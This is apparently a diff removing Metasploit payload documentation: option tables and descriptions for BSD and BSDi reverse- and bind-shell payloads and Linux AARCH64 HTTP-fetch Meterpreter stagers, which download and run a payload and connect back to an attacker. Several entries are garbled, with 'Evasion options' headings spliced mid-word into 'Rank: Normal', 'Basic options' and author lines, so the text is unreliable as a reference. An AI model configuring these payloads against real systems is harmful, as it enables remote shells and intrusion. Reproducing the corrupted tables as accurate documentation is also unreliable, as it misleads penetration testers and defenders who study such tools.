||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,48 +0,0 @@
|
||||
|
||||
Name: BSD Command Shell, Reverse TCP Inline (IPv6)
|
||||
Module: payload/bsd/x86/shell_reverse_tcp_ipv6
|
||||
Platform: BSD
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 96
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
vlad902 <vlad902@gmail.com>
|
||||
hdm <x@hdm.io>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
SCOPEID 0 no IPv6 scope ID, for link-local addresses
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell over IPv6
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AppendExit false no Append a stub that executes the exit(0) system call
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
|
||||
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
|
||||
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,43 +0,0 @@
|
||||
|
||||
Name: BSDi Command Shell, Bind TCP Stager
|
||||
Module: payload/bsdi/x86/shell/bind_tcp
|
||||
Platform: BSDi
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 69
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Listen for a connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,50 +0,0 @@
|
||||
|
||||
Name: BSDi Command Shell, Reverse TCP Stager
|
||||
Module: payload/bsdi/x86/shell/reverse_tcp
|
||||
Platform: BSDi
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 59
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Spawn a command shell (staged).
|
||||
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,32 +0,0 @@
|
||||
|
||||
Name: BSDi Command Shell, Bind TCP Inline
|
||||
Module: payload/bsdi/x86/shell_bind_tcp
|
||||
Platform: BSDi
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 90
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
optyx <optyx@no$email.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LPORT 4444 yes The listen port
|
||||
RHOST no The target address
|
||||
|
||||
Description:
|
||||
Listen for a connection and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,31 +0,0 @@
|
||||
|
||||
Name: BSDi Command Shell, Find Port Inline
|
||||
Module: payload/bsdi/x86/shell_find_port
|
||||
Platform: BSDi
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 77
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
optyx <optyx@no$email.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CPORT 37232 no The local client port
|
||||
|
||||
Description:
|
||||
Spawn a shell on an established connection
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,39 +0,0 @@
|
||||
|
||||
Name: BSDi Command Shell, Reverse TCP Inline
|
||||
Module: payload/bsdi/x86/shell_reverse_tcp
|
||||
Platform: BSDi
|
||||
Arch: x86
|
||||
Needs Admin: No
|
||||
Total size: 77
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
skape <mmiller@hick.org>
|
||||
optyx <optyx@no$email.com>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
Description:
|
||||
Connect back to attacker and spawn a command shell
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoVerifySession true yes Automatically verify and drop invalid sessions
|
||||
CommandShellCleanupCommand no A command to run before the session is closed
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,100 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 102
|
||||
Rank: Norma
|
||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp:
|
||||
=========================
|
||||
|
||||
ic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME fGKaZjGk no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
|
||||
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
|
||||
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
B
|
||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME QJpbzCbQetk no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Br
|
||||
Evasion options for payload/cmd/linux/http/aarch64/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
apid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME htteRZaNp no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an AARCH64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 114
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
